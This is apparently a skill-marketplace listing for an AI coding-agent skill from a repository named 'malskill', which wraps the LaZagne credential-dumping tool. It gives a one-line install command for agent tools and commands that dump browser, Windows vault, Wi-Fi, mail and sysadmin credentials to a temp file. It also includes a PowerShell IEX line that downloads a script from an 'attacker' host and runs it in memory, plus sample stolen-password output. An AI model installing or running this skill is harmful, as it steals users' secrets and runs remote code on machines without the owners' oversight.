offensive-tools/windows/lazagne/SKILL.md
Auth/lab ref: LaZagne secret-exposure audit; browser/app/Wi-Fi/Git artifacts, user/admin context, defensive validation evidence.
npx skillsauth add aeondave/malskill lazagneInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
Post-exploitation credential recovery from installed applications — browsers, mail, Git, databases, WiFi, and more.
# Dump everything
lazagne.exe all
# Browsers only
lazagne.exe browsers
# Specific module
lazagne.exe windows
| Category | What's Covered |
|----------|----------------|
| browsers | Chrome, Firefox, Edge, Opera, IE, Brave |
| windows | Credential Manager, DPAPI, LSA secrets, Vault |
| mails | Thunderbird, Outlook, Outlook Express |
| databases | MySQL, PostgreSQL, MSSQL, Oracle |
| network | WiFi passwords, VPN (Cisco, OpenVPN, WireGuard) |
| memory | KeePass, mRemoteNG, Pidgin |
| git | Git credentials |
| chats | Skype |
| sysadmin | WinSCP, PuTTY, FileZilla, mRemoteNG, TeamViewer |
| Flag | Description |
|------|-------------|
| all | Run all modules |
| <module> | Run specific module category |
| -oJ <file> | JSON output |
| -oN <file> | Text output |
| -oA <dir> | All output formats to directory |
| -v | Verbose |
| -vv | Debug |
| -quiet | No banner |
# Full credential dump to JSON
lazagne.exe all -oJ C:\Windows\Temp\creds.json -quiet
# Browser creds only
lazagne.exe browsers -v
# Sysadmin tool creds (WinSCP, FileZilla, etc.)
lazagne.exe sysadmin
# WiFi passwords
lazagne.exe network
# Run from PowerShell (in-memory if needed)
# Download and run without dropping to disk:
IEX(New-Object Net.WebClient).DownloadString('http://attacker/LaZagne.py')
[+] Password found !!!
URL: https://corp-mail.example.com
Login: [email protected]
Password: Summer2024!
| File | When to load |
|------|--------------|
| references/credential-sources.md | Module details, DPAPI decryption, browser DB paths, output parsing |
development
Auth/lab ref: Unicorn Engine CPU-only emulation for shellcode, decryptors, custom VM handlers, instruction tracing, memory hooks, and register-level experiments.
development
Auth/lab ref: Renode board and SoC simulation for MCU/RTOS firmware, UART/GPIO/peripheral modeling, GDB remote debugging, REPL platforms, and RESC scripts.
development
Auth/lab ref: Qiling OS-layer binary emulation for PE/ELF/Mach-O/UEFI/shellcode with rootfs, syscall/API hooks, filesystem mapping, and runtime patching.
databases
Auth/lab ref: QEMU user-mode and full-system emulation for cross-arch binaries, firmware, kernels, disks, serial consoles, networking, and GDB stubs.